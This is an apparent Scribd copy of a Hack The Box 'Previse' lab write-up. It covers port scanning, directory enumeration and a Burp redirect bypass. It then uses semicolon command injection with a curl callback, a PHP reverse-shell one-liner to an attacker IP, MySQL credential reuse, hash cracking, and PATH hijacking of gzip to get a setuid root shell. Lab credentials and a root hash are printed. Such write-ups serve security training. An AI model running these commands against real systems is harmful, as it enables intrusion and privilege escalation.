Scribd
Upload
38 views2 pages

Previse - 21st Aug 2021: Scanning

This document provides instructions for pen testing a machine located at the IP address 10.10.11.104. It describes running scans like Masscan and Nmap to identify open ports. It then discusses using the gobuster tool to enumerate directories on the web server. The document finds a vulnerability that allows command injection on the site. It provides steps to use this flaw to retrieve a reverse PHP shell and gain remote access to the system.

Uploaded by

Francisco Marques
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
38 views2 pages

Previse - 21st Aug 2021: Scanning

This document provides instructions for pen testing a machine located at the IP address 10.10.11.104. It describes running scans like Masscan and Nmap to identify open ports. It then discusses using the gobuster tool to enumerate directories on the web server. The document finds a vulnerability that allows command injection on the site. It provides steps to use this flaw to retrieve a reverse PHP shell and gain remote access to the system.

Uploaded by

Francisco Marques
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 2

Purp1eW0lf

Pen Testing
Pen Testing New page
Previse - 21st Aug 2021 Import

Edits 10.10.11.104 Export as PDF


Pen test notes
More

Activities Essential Kali Installs


CONTENTS
Desktop Config
Scanning
Share
Tips Enumeration

Design /nav.php

HTB - M AC HIN ES Burpsuite

Teams Exploit Site


Windows Boxes
Command Injection
Linux Boxes
Integrations Reverse Shell
Normal Boxes WWW-Data Shell
Analytics
Previse - 21st Aug 2021 MySQL

Crack the Hash


Schooled
Advanced
M4lwhere shell
Explore - 24th July 2021
Enumerate II

Cap - 20th June 2021 PrivEsc

Ophiuchi - 19th June 2021

Knife - 6th June 2021


Invite your team
Armageddon - 4th May
Collaborate, review and share
2021
great docs.

Ready - 13th March 2021


Invite your team
ScriptKiddie - 7th March
21
Scanning

We can run masscan_to_nmap.py , a tool I made that you can find on my Github. It runs a
Masscan, identifies open ports, and then takes those open ports over to Nmap, and scans for
versions and default scripts against those ports.

1 PORT STATE SERVICE VERSION


2 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
3 | http-cookie-flags:
4 | /:
5 | PHPSESSID:
6 |_ httponly flag not set
7 |_http-server-header: Apache/2.4.29 (Ubuntu)
8 | http-title: Previse Login
9 |_Requested resource was login.php

Enumeration

Let's enumerate the directories with gobuster

1 sudo gobuster dir -u http://10.10.11.104 -w \


2 /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt \
3 -t 50 -x php

We eventually get a hit for nav.php.

/nav.php

If we traverse to nav.php, we find some interesting options

But everytime we try to click on something we get re-directed!

Burpsuite

We can leverage burpsuite to prevent the site from re-directing us.

Interacept the request to create an account. Send that to repeater, and then look at what
acounts.php holds for us. If we can traverse to acounts.php, we will be able to create an admin-
level account on this website

In Burpsuite's Proxy tab, rightclick and choose do intercept, and then response to this request

Once we forward a couple times, we get this page. See line 1? Change it from a 302 status
code to 200, and then forward on further

And in the browser, we are given are sneaky route to the user creation page.

Exploit Site

Pick whatever creds you want, sign in, and then let's get to work

We can look under files and download a zip of the entire site

Reading through, we find some credentials that may be useful later

Looking hard line 19 of logs.php in the zip, we can also see a strange python flaw. Here, it
seems like we may be able to exec() whatever we like and get a shell on the box. Let's find out!

Command Injection

If we go to http://10.10.11.104/file_logs.php, we can try to download one of the files here.

Intercept it in burp, and then leverage a semi-colon to test if we get command execution and
have the machine hit us back with a curl

1 #on kali
2 sudo nc -nvlp 80
3
4 #in burpsuite
5 ; curl [your IP]/test

Reverse Shell

Now, we can leverage this command injection to get a reverse shell. We know the web server
has PHP on it, so let's use a PHP reverse shell and be sure to URL ecnode it (ctrl+u) in
Burpsuite. This ensures bad characters won't ruin it for us

php -r '$sock=fsockopen("1.x.x.x",4242);exec("/bin/sh -i <&3 >&3 2>&3");'

And we get a shell

WWW-Data Shell

If we run netstat -plunt , we can see that port 3306 is running internally - typically mysql
runs on this port

Earlier, when we downloaded the backup zip of the website, we found SQL creds:

User: root
DB: previse
Pass: mySQL_p@ssw0rd!:)

MySQL

Run this command, and then at the password prompt enter the password - ignore any errors

1 mysql -u root -D previse -p


2 # mySQL_p@ssw0rd!:)

Now, we want to see what tables there are: show tables;

Okay awesome, now let's see what's in the accounts table: select * from accounts;

Crack the Hash

Copy paste the username and hashes and run John

john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-


long

Eventually, we get the password for m4lwhere ; ilovecody112235!

M4lwhere shell

Back in our victim shell, we can now escelate to the m4lwhere user

1 su m4lwhere
2 #ilovecody112235!

And then we can get the user flag:

Enumerate II

If we sudo -l , we can run a backup script as root

If we read this backup script, it calls on gzip to do some stuff....don't get too distracted by the
stuff it does, notice that gzip isn't given it's full path. Because the full path isn't given, we can
create a malicious gzip binary and the script will call on this instead.

PrivEsc

We need to create our malicious gzip, and then change the path so our sudo script calls on the
'malicious gzip' chilling in /tmp.

1 # create malicious gzip, and use full paths for binaries


2 echo "/bin/cp /bin/bash /tmp/bash; /bin/chmod +s /tmp/bash" > /tmp/gzip
3
4 #make fake gzip have executable permissions
5 chmod +x /tmp/gzip
6
7 # change path
8 export PATH=/tmp
9
#run script will full binary path of sudo
10 /usr/bin/sudo /opt/scripts/access_backup.sh
Ignore any errors that sudo gives you....in your /tmp directory, a new /tmp/bash binary should
exist

Change your path back, and execute the new bash to become root

1 #change path back


2 source /etc/environment
3
4 #execute new bash binary for root
5 /tmp/bash -p

$6$QJgW9tG2$yIhp0MQm9b4ok8j9su9H0hJ.GuwI5AHusMrZBQv2oLfvotY5YR0MJ82zJ4xi5W
CKQSWn/a3HO/M/TjS/YC0Mk1

Password is root hash, starting with $6$QJg and ending with /YC0Mk1

Previous Next
Normal Boxes Schooled

Last updated 37 seconds ago

You might also like